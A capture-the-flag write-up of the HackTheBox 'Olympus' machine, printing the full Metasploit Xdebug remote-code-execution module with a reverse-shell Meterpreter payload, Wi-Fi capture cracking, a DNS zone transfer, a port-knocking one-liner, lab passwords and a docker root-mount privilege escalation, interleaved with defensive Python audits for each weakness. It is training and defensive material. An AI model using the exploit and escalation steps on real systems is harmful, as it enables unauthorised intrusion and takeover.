HackTheBox Writeup — Olympus

Olympus

Hello Guys, I am Faisal Husaini and this is my writeup on Medium for the Olympus machine, which has now retired. It was also my favorite box on HTB. My username on HTB is "faisalelino".

This writeup covers the Olympus box, one of the hardest boxes on HTB. The experience of solving it was great, as I learned about a lot of things along the way.

The IP for this machine is 10.10.10.83, so let's get started.

First we do an nmap scan using the command "nmap -sC -sV -oA nmap 10.10.10.83":

# Nmap 7.70 scan initiated Sun Jun 10 02:19:00 2018 as: nmap -sC -sV -oA nmap 10.10.10.83
Nmap scan report for 10.10.10.83
Host is up (0.19s latency).
Not shown: 992 closed ports
PORT STATE SERVICE VERSION
22/tcp filtered ssh
53/tcp open domain (unknown banner: Bind)
| dns-nsid:
|_ bind.version: Bind
| fingerprint-strings:
| DNSVersionBindReqTCP:
| version
| bind
|_ Bind
80/tcp open http Apache httpd
|_http-server-header: Apache
|_http-title: Crete island — Olympus HTB
85/tcp filtered mit-ml-dev
144/tcp filtered news
2222/tcp open ssh (protocol 2.0)
| fingerprint-strings:
| NULL:
|_ SSH-2.0-City of olympia
| ssh-hostkey:
| 2048 f2:ba:db:06:95:00:ec:05:81:b0:93:60:32:fd:9e:00 (RSA)
| 256 79:90:c0:3d:43:6c:8d:72:19:60:45:3c:f8:99:14:bb (ECDSA)
|_ 256 f8:5b:2e:32:95:03:12:a3:3b:40:c5:11:27:ca:71:52 (ED25519)
4004/tcp filtered pxc-roid
9040/tcp filtered tor-trans
2 services unrecognized despite returning data. If you know the service/version, please submit the following fingerprints at https://nmap.org/cgi-bin/submit.cgi?new-service :
==============NEXT SERVICE FINGERPRINT (SUBMIT INDIVIDUALLY)==============
SF-Port53-TCP:V=7.70%I=7%D=6/10%Time=5B1C3D7C%P=x86_64-pc-linux-gnu%r(DNSV
SF:ersionBindReqTCP,3F,"\0=\0\x06\x85\0\0\x01\0\x01\0\x01\0\0\x07version\x
SF:04bind\0\0\x10\0\x03\xc0\x0c\0\x10\0\x03\0\0\0\0\0\x05\x04Bind\xc0\x0c\
SF:0\x02\0\x03\0\0\0\0\0\x02\xc0\x0c");
==============NEXT SERVICE FINGERPRINT (SUBMIT INDIVIDUALLY)==============
SF-Port2222-TCP:V=7.70%I=7%D=6/10%Time=5B1C3D77%P=x86_64-pc-linux-gnu%r(NU
SF:LL,29,"SSH-2\.0-City\x20of\x20olympia\x20\x20\x20\x20\x20\x20\x20\x20\x
SF:20\x20\x20\x20\x20\x20\x20\x20\r\n");

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
# Nmap done at Sun Jun 10 02:20:18 2018 -- 1 IP address (1 host up) scanned in 78.87 seconds

We see that port 22 for SSH is filtered and port 80 is open, so let's open the IP in the browser.

Nothing interesting here. Let's look at the source code too.

Source Code of http://10.10.10.83

We see nothing much of importance on the HTTP page, and we got nothing from its source code either, so it's time for a dirb scan.

Dirb Results

We don't get anything much of use from dirb, so it's time to run nikto on http://10.10.10.83/

Nikto Results

Nikto says an uncommon header 'xdebug' was found, so now let's google it.

About XDebug

That is what the official Xdebug website says about it, so let's look for an exploit for it, if one exists.

##
# This module requires Metasploit: https://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##

class MetasploitModule < Msf::Exploit::Remote
  Rank = ExcellentRanking

  include Msf::Exploit::Remote::Tcp
  include Msf::Exploit::Remote::HttpClient
  include Rex::Proto::Http
  include Msf::Exploit::FileDropper

  def initialize(info = {})
    super(update_info(info,
      'Name'           => 'xdebug Unauthenticated OS Command Execution',
      'Description'    => %q{
        Module exploits a vulnerability in the eval command present in Xdebug versions 2.5.5 and below.
        This allows the attacker to execute arbitrary php code as the context of the web user.
      },
      'DisclosureDate' => 'Sep 17 2017',
      'Author'         => [
        'Ricter Zheng',   # Discovery https://twitter.com/RicterZ
        'Taki Tachibana', # MinatoTW
        'Mumbai'          # Austin Hudson
      ],
      'References'     => [
        ['URL', 'https://redshark1802.com/blog/2015/11/13/xpwn-exploiting-xdebug-enabled-servers/'],
        ['URL', 'https://paper.seebug.org/397/']
      ],
      'License'        => MSF_LICENSE,
      'Platform'       => 'php',
      'Arch'           => [ARCH_PHP],
      'DefaultTarget'  => 0,
      'Stance'         => Msf::Exploit::Stance::Aggressive,
      'DefaultOptions' => {
        'PAYLOAD' => 'php/meterpreter/reverse_tcp'
      },
      'Payload'        => {
        'DisableNops' => true,
      },
      'Targets'        => [[ 'Automatic', {} ]],
    ))

    register_options([
      OptString.new('PATH', [ true, "Path to target webapp", "/index.php"]),
      OptAddress.new('SRVHOST', [ true, "Callback host for accepting connections", "0.0.0.0"]),
      OptInt.new('SRVPORT', [true, "Port to listen for the debugger", 9000]),
      Opt::RPORT(80),
      OptString.new('WriteableDir', [ true, "A writeable directory on the target", "/tmp"])
    ])
  end

  # Asks the target to start a debug session and looks for an XDEBUG response header.
  def check
    begin
      res = send_request_cgi({
        'uri' => datastore["PATH"],
        'method' => 'GET',
        'vars_get' => {
          'XDEBUG_SESSION_START' => rand_text_alphanumeric(10)
        }
      })
      vprint_status "Request sent\n#{res.headers}"
      if res && res.headers.to_s =~ /XDEBUG/i
        vprint_good("Looks like remote server has xdebug enabled\n")
        return CheckCode::Detected
      else
        return CheckCode::Safe
      end
    rescue Rex::ConnectionError
      return CheckCode::Unknown
    end
  end

  def exploit
    payl = Rex::Text.encode_base64("#{payload.encoded}")
    file = "#{datastore['WriteableDir']}" + "/" + rand_text_alphanumeric(5)
    # DBGp "eval" command: the PHP code is sent base64-encoded and NUL-terminated
    cmd1 = "eval -i 1 -- " + Rex::Text.encode_base64("file_put_contents(\"#{file}\",base64_decode(\"#{payl}\")) && system(\" php #{file} \")") + "\x00"
    # Listener playing the role of the IDE; Xdebug connects back to it on SRVPORT (default 9000)
    webserver = Thread.new do
      begin
        server = Rex::Socket::TcpServer.create(
          'LocalPort' => datastore['SRVPORT'],
          'LocalHost' => datastore['SRVHOST'],
          'Context' => {
            'Msf' => framework,
            'MsfExploit' => self
          })

        client = server.accept
        print_status("Waiting for client response.")
        data = client.recv(1024)
        print_status("Receiving response")
        vprint_line(data)
        print_status("Shell might take upto a minute to respond.Please be patient.")
        print_status("Sending payload of size #{cmd1.length} bytes")
        register_file_for_cleanup(file)
        client.write(cmd1)
        client.close
        server.close
        webserver.exit
      ensure
        webserver.exit
      end
    end
    # X-Forwarded-For is the address a remote_connect_back-enabled Xdebug dials out to
    send_request_cgi({
      'uri' => datastore['PATH'],
      'method' => 'GET',
      'headers' => {
        'X-Forwarded-For' => "#{lhost}",
        'Cookie' => 'XDEBUG_SESSION=' + rand_text_alphanumeric(10)
      }
    })
  end
end

We have to set RHOST to 10.10.10.83 and LHOST to our tun0 IP address, and then run the exploit command.
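The module above only works because the server's Xdebug is configured to connect back to whatever address the HTTP client names. As an added example (not part of this writeup or of Metasploit), here is the check a defender would run over a php.ini fragment to find that configuration before someone else does. It assumes Xdebug 2.x directive names, which are the versions the module targets; both config fragments are constructed.

```python
"""Audit an Xdebug 2.x php.ini fragment for the settings that let an
unauthenticated client on the network attach a debugger (the exposure the
Metasploit module above drives).  Added example, not part of the original
writeup or of Metasploit; the two config fragments below are constructed."""
import re

TRUE_VALUES = {"1", "on", "true", "yes"}
LOOPBACK = {"127.0.0.1", "localhost", "::1"}


def parse_ini(text):
    """Map 'key = value' lines to a dict; ';' comments and [sections] are skipped."""
    settings = {}
    for raw in text.splitlines():
        line = raw.split(";", 1)[0].strip()
        if not line or line.startswith("["):
            continue
        m = re.match(r"([A-Za-z0-9_.]+)\s*=\s*(.*)$", line)
        if m:
            settings[m.group(1).lower()] = m.group(2).strip().strip("\"'").lower()
    return settings


def audit_xdebug(ini_text):
    """Return a list of findings; an empty list means remote debugging is off.

    Directive names are the Xdebug 2.x ones (the versions the module targets);
    Xdebug 3 renamed them (xdebug.mode, xdebug.discover_client_host, xdebug.client_host).
    """
    s = parse_ini(ini_text)
    if s.get("xdebug.remote_enable", "0") not in TRUE_VALUES:
        return []  # remote debugging disabled: the other knobs are inert
    findings = ["xdebug.remote_enable is on; a debugger can attach to this PHP process"]
    if s.get("xdebug.remote_connect_back", "0") in TRUE_VALUES:
        # With connect_back Xdebug ignores remote_host and dials out to the address in
        # X-Forwarded-For (or REMOTE_ADDR), so any client can nominate itself as the IDE.
        findings.append("xdebug.remote_connect_back is on: debugger host is chosen by the HTTP client")
    host = s.get("xdebug.remote_host", "localhost")  # Xdebug 2 default
    if host not in LOOPBACK:
        findings.append(f"xdebug.remote_host={host} points off the local machine")
    if s.get("xdebug.remote_autostart", "0") in TRUE_VALUES:
        findings.append("xdebug.remote_autostart is on: every request opens a debug session")
    return findings


# Constructed fragments: the first resembles a developer setup left on a web server,
# the second keeps the extension loaded but debugging switched off.
WEAK_INI = """
[xdebug]
zend_extension = xdebug.so
xdebug.remote_enable = 1
xdebug.remote_connect_back = 1   ; lets the client pick the callback host
xdebug.remote_port = 9000
"""

HARDENED_INI = """
[xdebug]
zend_extension = xdebug.so
xdebug.remote_enable = 0
xdebug.remote_connect_back = 0
xdebug.remote_host = 127.0.0.1
"""

if __name__ == "__main__":
    for name, ini in (("weak", WEAK_INI), ("hardened", HARDENED_INI)):
        print(name, audit_xdebug(ini) or "no findings")
```

The weak fragment produces two findings (remote debugging on, callback host chosen by the client); the hardened one produces none. On a real server, the same check belongs in whatever config-management or CI step ships php.ini, since the nikto "uncommon header" finding above is the symptom, not the cause.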

Meterpreter

Bingo! We got a meterpreter session, now let's move on and look at the contents.

Nothing much here, let's look at the contents of the zeus user's home.

We see what look like git folders, airgeddon.sh, a folder named captured, etc.

Let's look at the contents of airgeddon.sh: it's a very lengthy bash script, so nothing interesting there. Now let's dive into the captured folder.

We find a .cap file, which we download using our meterpreter shell.

Now let's crack this captured.cap file using aircrack.

Cracking CAP file using Aircrack-ng

We crack the captured.cap file using the tool aircrack-ng.

Command used: aircrack-ng captured.cap -w rockyou.txt, and then we wait for the cracking to finish.

aircrack-ng

We got the key, which is "flightoficarus".

This was a bit tricky to understand. Then I realised that the word Icarus is Greek, which fits the theme of this box, and from the nmap results we saw that SSH is open on port 2222, so Icarus might be the username. But what about the password?

After asking a friend for a hint, he told me to look at the captured.cap file, so I thought the word "captured" might be the password, but no!

Then I opened the captured.cap file using Wireshark.

We see something like a sentence, which might be the password; the sentence was "Too_cl0se_to_th3_Sun". Now we copy this and connect to SSH.

We connect to ssh using this command:

ssh icarus@10.10.10.83 -p2222

ssh connection successful

Bingo, we got into SSH. Let's see what's inside the home folder with the "ls" command.

We see a txt file named help_of_the_gods.txt, and inside it we find a DNS name, so I copy it to my /etc/hosts file with the IP 10.10.10.83.

I tried a lot of things; browsing to ctfolympus.htb showed the same page as browsing to the IP.

So after getting some help from my friend, he told me to use dig.

So I used dig with "dig axfr ctfolympus.htb @10.10.10.83", and we get:

Zone Transfers

In the TXT record we see "St34l_th3_F1re!", which is similar in style to the password we got for Icarus from captured.cap.

But what about the username? We see "prometheus" in the same TXT record, but when we tried it on SSH port 2222, the connection failed.
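The dig command above succeeded because the name server answered an AXFR from an arbitrary client. As an added example (not part of the writeup), the following Python reads BIND query-log lines and flags zone transfers requested by anything other than the zone's secondaries; the log lines are constructed to mirror the request made above, and the default BIND 9 query-log layout is assumed.

```python
"""Flag zone transfers (AXFR/IXFR) requested from hosts that are not the zone's
secondaries, by reading BIND query-log lines.  Added example, not part of the
writeup; the log lines below are constructed to mimic the dig command above."""
import ipaddress
import re

# Default BIND 9 "queries" category layout; some builds insert "@0x..." after "client".
QUERY_RE = re.compile(
    r"client (?:@0x[0-9a-f]+ )?(?P<src>[0-9A-Fa-f.:]+)#\d+ \((?P<zone>[^)]*)\): "
    r"query: (?P<name>\S+) IN (?P<qtype>[A-Z0-9]+)"
)


def parse_query(line):
    """Return the src/zone/name/qtype fields of a query-log line, or None."""
    m = QUERY_RE.search(line)
    return m.groupdict() if m else None


def unauthorized_transfers(lines, allowed_nets):
    """List (src, name) for AXFR/IXFR requests whose source is outside allowed_nets."""
    nets = [ipaddress.ip_network(n, strict=False) for n in allowed_nets]
    hits = []
    for line in lines:
        q = parse_query(line)
        if q is None or q["qtype"] not in ("AXFR", "IXFR"):
            continue
        src = ipaddress.ip_address(q["src"])
        if not any(src in net for net in nets):
            hits.append((q["src"], q["name"]))
    return hits


# Constructed sample: a normal lookup, a transfer from a client on the attacker's
# side of the network, and a legitimate transfer from the zone's secondary.
SAMPLE_LOG = """\
10-Jun-2018 02:19:01.100 queries: info: client 10.10.14.2#50123 (www.ctfolympus.htb): query: www.ctfolympus.htb IN A +E(0) (10.10.10.83)
10-Jun-2018 02:20:14.301 queries: info: client 10.10.14.2#33982 (ctfolympus.htb): query: ctfolympus.htb IN AXFR +T (10.10.10.83)
10-Jun-2018 02:21:00.002 queries: info: client 10.10.10.84#41000 (ctfolympus.htb): query: ctfolympus.htb IN AXFR +T (10.10.10.83)
""".splitlines()

SECONDARIES = ["10.10.10.84/32"]   # constructed: the only host allowed to pull the zone

if __name__ == "__main__":
    for src, zone in unauthorized_transfers(SAMPLE_LOG, SECONDARIES):
        print(f"ALERT: zone transfer of {zone} requested by {src}")
```

Detection is the fallback; the fix on the server is the BIND option `allow-transfer { <secondary addresses>; };` in the zone or options block (or `allow-transfer { none; };` on a server with no secondaries), which turns the request above into a REFUSED answer.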

Also, port 22 was filtered. At that point I didn't know about port knocking; my friend helped by telling me to watch Ippsec's Nineveh video.

From that I learned about port knocking, and now we get to that part.

I created a simple bash one-liner for the port knocking.

After watching the Nineveh video from Ippsec, I saw that he took the 3 ports from iptables or something similar, which I didn't have on this box.

So what to do?

Remember the TXT record we got from dig: it said "portal to Hades" and then gave 3 numbers.

portal

These are the 3 ports to be used for port knocking, i.e. 3456, 8234, 62431.

So I used this command for knocking, and then connected directly to SSH on port 22:

for i in 3456 8234 62431; do nmap -Pn -p $i --host-timeout 201 --max-retries 0 10.10.10.83; done; ssh prometheus@10.10.10.83

Port Knocking SSH

Now it connects to SSH without the port being filtered; now we enter the password, which was "St34l_th3_F1re!".
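Port knocking hides the SSH port, but every successful knock is also something the host's owner should be able to see. As an added example (not from the writeup), here is the audit side: Python that reads iptables LOG lines and reports each source that completed the three-port sequence given above within a short window. It assumes the firewall logs SYNs to closed ports with an "IPT-DROP:" prefix and, like knockd, treats any other port hit from the same source as a reset of the sequence; the kernel log lines are constructed.

```python
"""Recognise completed port-knock sequences in iptables LOG output so that each
opening of the hidden SSH port is auditable.  Added example, not from the writeup;
the kernel log lines are constructed around the three ports given above, and the
firewall is assumed to log SYNs to closed ports with the prefix "IPT-DROP:"."""
import re
from datetime import datetime, timedelta

# Syslog timestamp, then the iptables fields we need (PROTO precedes SPT/DPT in LOG output).
LINE_RE = re.compile(
    r"^(?P<ts>[A-Z][a-z]{2}\s+\d{1,2} \d\d:\d\d:\d\d) .*?"
    r"SRC=(?P<src>[0-9.]+) .*?PROTO=TCP .*?DPT=(?P<dpt>\d+)"
)

KNOCK_SEQUENCE = [3456, 8234, 62431]   # the "portal to Hades" ports from the TXT record


def parse_line(line):
    """Return (timestamp, src, dport) for a firewall log line, else None."""
    m = LINE_RE.search(line)
    if not m:
        return None
    # Syslog timestamps carry no year; only deltas within one log file matter here.
    ts = datetime.strptime(m.group("ts").replace("  ", " "), "%b %d %H:%M:%S")
    return ts, m.group("src"), int(m.group("dpt"))


def completed_knocks(lines, sequence=KNOCK_SEQUENCE, window=timedelta(seconds=10)):
    """List (src, timestamp) for each source that hit `sequence` in order within `window`.

    Any other port hit from the same source in between resets the sequence (knockd
    behaviour), so the last len(sequence) hits must match exactly.
    """
    recent = {}   # src -> list of (ts, dport), oldest first
    done = []
    n = len(sequence)
    for line in lines:
        parsed = parse_line(line)
        if parsed is None:
            continue
        ts, src, dpt = parsed
        hits = recent.setdefault(src, [])
        hits.append((ts, dpt))
        del hits[:-n]                       # keep only the last n hits
        if (len(hits) == n and [d for _, d in hits] == sequence
                and hits[-1][0] - hits[0][0] <= window):
            done.append((src, ts))
            hits.clear()                    # a new sequence must start from scratch
    return done


# Constructed kernel log: one source completes the knock and then reaches port 22;
# a second source hits an unrelated port mid-sequence and never completes it.
SAMPLE_LOG = """\
Jun 10 02:25:01 olympus kernel: [  312.100] IPT-DROP: IN=eth0 OUT= SRC=10.10.14.2 DST=10.10.10.83 LEN=44 TTL=63 PROTO=TCP SPT=40001 DPT=3456 WINDOW=1024 SYN
Jun 10 02:25:01 olympus kernel: [  312.350] IPT-DROP: IN=eth0 OUT= SRC=10.10.14.2 DST=10.10.10.83 LEN=44 TTL=63 PROTO=TCP SPT=40002 DPT=8234 WINDOW=1024 SYN
Jun 10 02:25:02 olympus kernel: [  312.600] IPT-DROP: IN=eth0 OUT= SRC=10.10.14.2 DST=10.10.10.83 LEN=44 TTL=63 PROTO=TCP SPT=40003 DPT=62431 WINDOW=1024 SYN
Jun 10 02:25:03 olympus kernel: [  313.000] IPT-ACCEPT: IN=eth0 OUT= SRC=10.10.14.2 DST=10.10.10.83 LEN=60 TTL=63 PROTO=TCP SPT=40004 DPT=22 WINDOW=29200 SYN
Jun 10 02:40:10 olympus kernel: [ 1220.000] IPT-DROP: IN=eth0 OUT= SRC=10.10.14.9 DST=10.10.10.83 LEN=44 TTL=63 PROTO=TCP SPT=51000 DPT=3456 WINDOW=1024 SYN
Jun 10 02:40:11 olympus kernel: [ 1221.000] IPT-DROP: IN=eth0 OUT= SRC=10.10.14.9 DST=10.10.10.83 LEN=44 TTL=63 PROTO=TCP SPT=51001 DPT=80 WINDOW=1024 SYN
Jun 10 02:40:12 olympus kernel: [ 1222.000] IPT-DROP: IN=eth0 OUT= SRC=10.10.14.9 DST=10.10.10.83 LEN=44 TTL=63 PROTO=TCP SPT=51002 DPT=8234 WINDOW=1024 SYN
Jun 10 02:40:13 olympus kernel: [ 1223.000] IPT-DROP: IN=eth0 OUT= SRC=10.10.14.9 DST=10.10.10.83 LEN=44 TTL=63 PROTO=TCP SPT=51003 DPT=62431 WINDOW=1024 SYN
""".splitlines()

if __name__ == "__main__":
    for src, ts in completed_knocks(SAMPLE_LOG):
        print(f"{ts:%b %d %H:%M:%S} knock sequence completed by {src}")
```

Only 10.10.14.2 is reported; 10.10.14.9 broke its sequence with the hit on port 80. Pairing this report with the sshd auth log shows whether the door that was opened was then used, and by which account.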

Connection Successful

And we get in, now let's get the user flag.

The user flag was in the same directory, so when we run ls and then cat "user.txt", we get the flag.

User Flag

Bingo, now it's time for root.

Let's import the LinEnum.sh script from my local machine, run it and look at the results.

We were not able to run sudo as prometheus, so after the script finished we saw only one interesting thing.

LinEnum.sh

The user was hosting docker, which might be a hint towards docker privilege escalation, so after searching Google for docker privilege escalation, I got:

docker run [tab tab]   (tab completion lists the available images)
docker run -t -i olympia /bin/bash
docker run -v /root:/root -i -t olympia /bin/bash

So I ran the last command and then got the root flag.

Docker Priv Esc

We got root, now it's time to get the root flag, which is located in /root/root.txt.

Remember the 3 docker commands I gave above; use the 3rd one to get the flag.
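The third command works because anyone who can talk to the Docker daemon can bind-mount any host directory into a container they control, which makes docker-group membership equivalent to root. As an added example (not from the writeup), here is the audit a host owner would run: Python that reads `docker inspect` output for bind mounts of sensitive host paths and lists the members of the docker group. The inspect JSON and /etc/group text are constructed.

```python
"""Audit `docker inspect` output for bind mounts that expose sensitive host paths
(the "-v /root:/root" run above) and list who can drive the daemon via the docker
group.  Added example, not from the writeup; the JSON and /etc/group text are constructed."""
import json

# Host paths whose exposure inside a container is equivalent to root on the host.
SENSITIVE_PREFIXES = ("/root", "/etc", "/home", "/var/run/docker.sock", "/proc", "/sys")


def is_sensitive(host_path):
    """True for '/' itself or anything at or below a sensitive prefix."""
    p = host_path.rstrip("/") or "/"
    if p == "/":
        return True
    return any(p == s or p.startswith(s + "/") for s in SENSITIVE_PREFIXES)


def risky_binds(inspect_json):
    """Return (container, host_path, container_path, writable) for risky bind mounts.

    Reads the "Mounts" array that `docker inspect <container>` emits; Docker
    stores container names with a leading slash, which is stripped here.
    """
    findings = []
    for container in json.loads(inspect_json):
        for m in container.get("Mounts", []):
            if m.get("Type") != "bind":
                continue
            if is_sensitive(m["Source"]):
                findings.append((container["Name"].lstrip("/"), m["Source"],
                                 m["Destination"], bool(m.get("RW", True))))
    return findings


def docker_group_members(group_text):
    """Users on the 'docker' line of /etc/group: each can run 'docker run -v /root:/root'."""
    for line in group_text.splitlines():
        fields = line.split(":")
        if len(fields) == 4 and fields[0] == "docker":
            return [u for u in fields[3].split(",") if u]
    return []


# Constructed `docker inspect` output for two containers and a constructed /etc/group.
INSPECT_JSON = json.dumps([
    {"Name": "/olympia_shell",
     "Mounts": [{"Type": "bind", "Source": "/root", "Destination": "/root",
                 "Mode": "", "RW": True, "Propagation": "rprivate"}]},
    {"Name": "/web",
     "Mounts": [{"Type": "bind", "Source": "/srv/www", "Destination": "/var/www",
                 "Mode": "ro", "RW": False, "Propagation": "rprivate"},
                {"Type": "volume", "Name": "webdata",
                 "Source": "/var/lib/docker/volumes/webdata/_data",
                 "Destination": "/data", "RW": True}]},
])

GROUP_FILE = "root:x:0:\nsudo:x:27:\ndocker:x:999:prometheus\n"

if __name__ == "__main__":
    for name, src, dst, rw in risky_binds(INSPECT_JSON):
        print(f"{name}: host {src} mounted at {dst} ({'rw' if rw else 'ro'})")
    print("docker group:", docker_group_members(GROUP_FILE))
```

The first container is reported (host /root mounted read-write); the second is not, because its bind is under /srv and its other mount is a named volume. The durable fix is to keep the docker group down to the same people who already hold sudo, or to run the daemon in rootless mode so a container cannot reach host paths the invoking user cannot.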

Root Flag

This machine was really awesome and I gained a lot of knowledge from it, like port knocking, Docker privilege escalation, etc.

  1. XDebug Exploitation
  2. Zone Transfers
  3. Port Knocking
  4. Docker Privilege Escalation

References

XDebug Exploit by MinatoTW on HTB → https://www.exploit-db.com/exploits/44568/

Ippsec’s Nineveh Video for Port Knocking → https://www.youtube.com/watch?v=K9DKULxSBK4

Docker Privilege Escalation → https://fosterelli.co/privilege-escalation-via-docker.html

Hacker | Bug Hunter | Python Coder | Gamer | Reverse Engineering Lover
